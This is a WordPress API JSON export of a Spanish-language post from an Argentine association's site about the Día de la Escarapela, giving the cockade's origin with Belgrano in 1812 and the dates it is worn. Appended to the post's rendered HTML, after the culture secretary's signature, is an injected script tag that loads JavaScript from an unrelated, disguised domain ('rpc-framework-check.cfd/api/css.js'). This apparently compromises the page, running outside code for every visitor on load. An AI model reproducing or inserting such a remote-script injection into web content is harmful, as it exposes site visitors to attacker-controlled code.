{"id":18467,"date":"2025-05-18T00:00:00","date_gmt":"2025-05-18T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18467"},"modified":"2026-02-02T17:06:09","modified_gmt":"2026-02-02T20:06:09","slug":"dia-de-la-escarapela-2","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/dia-de-la-escarapela-2\/","title":{"rendered":"D\u00eda de la Escarapela"},"content":{"rendered":"\n<p>\ud83c\udde6\ud83c\uddf7Esta fecha se celebra cada 18 de mayo, debido a que ese d\u00eda, pero del a\u00f1o 1812, el General Manuel Belgrano solicit\u00f3 al Primer Triunvirato la creaci\u00f3n de la escarapela como distintivo nacional, con el objetivo de unificar los colores del ej\u00e9rcito y diferenciarlos de los realistas.<\/p>\n\n\n\n<p>En 1935, el Consejo Nacional de Educaci\u00f3n propuso la celebraci\u00f3n de este d\u00eda, conmemorando la creaci\u00f3n de este s\u00edmbolo patrio.<\/p>\n\n\n\n<p>Los argentinos\/as utilizamos esta insignia del lado izquierdo del pecho, en las fechas vinculadas a su creaci\u00f3n (18 de febrero), durante toda la Semana de Mayo (desde el 18 al 25), y tambi\u00e9n en d\u00edas festivos nacionales, tales como el D\u00eda de la Bandera (20 de junio) y el D\u00eda de la Independencia (9 de julio).<\/p>\n\n\n\n<p>Secretar\u00eda de Cultura, Ledys Udaquiola.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83c\udde6\ud83c\uddf7Esta fecha se celebra cada 18 de mayo, debido a que ese d\u00eda, pero del&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18468,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18467","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18467","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18467"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18467\/revisions"}],"predecessor-version":[{"id":20809,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18467\/revisions\/20809"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18468"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18467"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18467"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18467"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}